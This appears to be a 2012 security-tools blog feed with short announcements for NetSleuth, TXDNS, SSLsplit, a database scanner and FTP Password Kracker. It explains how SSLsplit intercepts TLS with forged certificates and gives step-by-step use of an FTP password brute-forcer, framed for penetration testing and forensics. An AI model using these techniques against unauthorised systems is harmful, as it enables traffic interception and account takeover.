NetSleuth is an opensource network forensics and analysis tool, designed for triage in incident response situations. It can identify and fingerprint network hosts and devices from pcap files captured from Ethernet or WiFi data (from tools like Kismet).
It also includes a live mode, silently identifying hosts and devices without needing to send any packets or put the network adapters into promiscuous mode ("silent portscanning").
NetSleuth is a free network monitoring, cyber security and network forensics analysis (NFAT) tool that provides the following features:
  • An easy realtime overview of what devices and what people are connected to any WiFi or Ethernet network.
  • Free. The tool can be downloaded for free, and the source code is available under the GPL.
  • Simple and cost effective. No requirement for hardware or reconfiguration of networks.
  • “Silent portscanning” and undetectable network monitoring on WiFi and wired networks.
  • Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more.
  • Offline analysis of pcap files, from tools like Kismet or tcpdump, to aid in intrusion response and network forensics.

[TXDNS v 2.2.1] Aggressive multithreaded DNS digger

TXDNS is a Win32 aggressive multithreaded DNS digger. Capable of placing, on the wire, thousands of DNS queries per minute. TXDNS main goal is to expose a domain namespace trough a number of techniques:
-- Typos: Mised, doouble and transposde keystrokes;
-- TLD/ccSLD rotation;
-- Dictionary attack;
-- Full Brute-force attack: alpha, numeric or alphanumeric charsets.

New features:

  • Support AAAA(IPv6)record queries:
    • -rr AAAA;
  • Rewrite summarizing statistics using a thread-safe algorithm instead mutex.

Bug fixes:

  • Fixed a problem when running under Windows XP;
  • Fixed a problem when parsing a IPv6 address.
  • November 9th, 2012 by Arley Silveira

Thursday, November 8, 2012

[SSLsplit 0.4.5] Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections.  Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit.  SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted.  SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6.  For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension.  SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites.  SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones.  SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way.


SSLsplit depends on the OpenSSL and libevent 2.x libraries. The build depends on GNU make and a POSIX.2 environment in `PATH`. The (optional) unit tests depend on check.

SSLsplit currently supports the following operating systems and NAT engines:
  •    FreeBSD: pf rdr, ipfw fwd, ipfilter rdr
  •    OpenBSD: pf rdr
  •    Linux: netfilter REDIRECT and TPROXY
  •    Mac OS X: ipfw fwd


    make test       # optional unit tests
    make install    # optional install

Dependencies are autoconfigured using pkg-config.  If dependencies are not
picked up and fixing `PKG_CONFIG_PATH` does not help, you can specify their
respective locations manually by setting `OPENSSL_BASE`, `LIBEVENT_BASE` and/or
`CHECK_BASE` to the respective prefixes.

You can override the default install prefix (`/usr/local`) by setting `PREFIX`.

SSLsplit is being developed on Github.  For bug reports, please use the Github
issue tracker.  For patch submissions, please send me pull requests.

Download SSLsplit 0.4.5

Wednesday, November 7, 2012

[Network Database Scanner v1.0] Software to remotely detect the type of Database services running on the network system

Network Database Scanner is the free software to remotely detect the type of Database services running on the network system. It can help you to scan single or multiple systems on your internal network or on the Internet.

It uses smart timer based Connect method which makes the scanning faster than traditional approach.

Current version supports following popular Database Services, 
  •     MySQL
  •     MSSQL
  •     Oracle
  •     DB2
  •     PostgreSQL
After the successful scan, it performs fingerprint verification for few Databases. In case of MySQL, it also detects the current database version.

Penetration Testers can find it useful in remotely detecting the presence of database services on the network. Then based on the type of Database, they can use additional tools such as Mysql Password Auditor, Oracle Password Auditor etc to get greater results.

'Network Database Scanner' works perfectly on 32bit as well as 64 bit systems and supports all Windows platforms starting from Windows XP to Windows 8.

License  : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win
more info

[FTP Password Kracker] Crack FTP password

FTP Password Kracker is a free software to recover your lost FTP password directly from server. It uses brute-force password cracking method based on universal FTP protocol and can recover password from any FTP server.

It automatically detects and alerts you if the target FTP server allows any Anonymous (without password) connections. In case your FTP server is running on different port (other than port 21) then you can easily specify the same in the tool along with server IP address.

By default it includes sample dictionary (password list) file for password cracking. However you can find good collection of password dictionaries (also called wordlists) here & here.
If your password is complex then you can use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'FTP Password Kracker'.

For penetration testers and forensic investigators, it can be very handy tool in discovering poorly configured FTP accounts.
It works on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8.

Here are the main benefits of FTP Password Kracker:

  • Free tool to recover the lost FTP password
  • Works against any FTP server.
  • Automatically remembers last used settings
  • Option to specify non-standard FTP port.
  • Uses siimple & quicker Dictionary Crack method
  • Displays detailed statistics during Cracking operation
  • Stop the password cracking operation any time.
  • Generate Password Recovery report in HTML/XML/TEXT format.
  • Includes Installer for local Installation & Uninstallation.
How to use? 

It is very easy to use tool for any generation of users.

Here are simple steps:
  • Install 'FTP Password Kracker' on any system.
  • Enter the IP Address & Port number (default 21) of the FTP Server.
  • Then enter the username (Example: admin, anonymous etc)
  • Next select the password dictionary file by clicking on Browse button or simply drag & drop it. You can find a sample dictionary file in the installed location.
  • Finally click on 'Start Crack' to start the FTP Password recovery.
  • During the operation, you will see all statistics being displayed on the screen. Message box will be displayed on success.
  • At the end, you can generate detailed report in HTML/XML/Text format by clicking on 'Report' button and then select the type of file from the drop down box of 'Save File Dialog'.

Download FTP Password Kracker
License  : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win8
More Info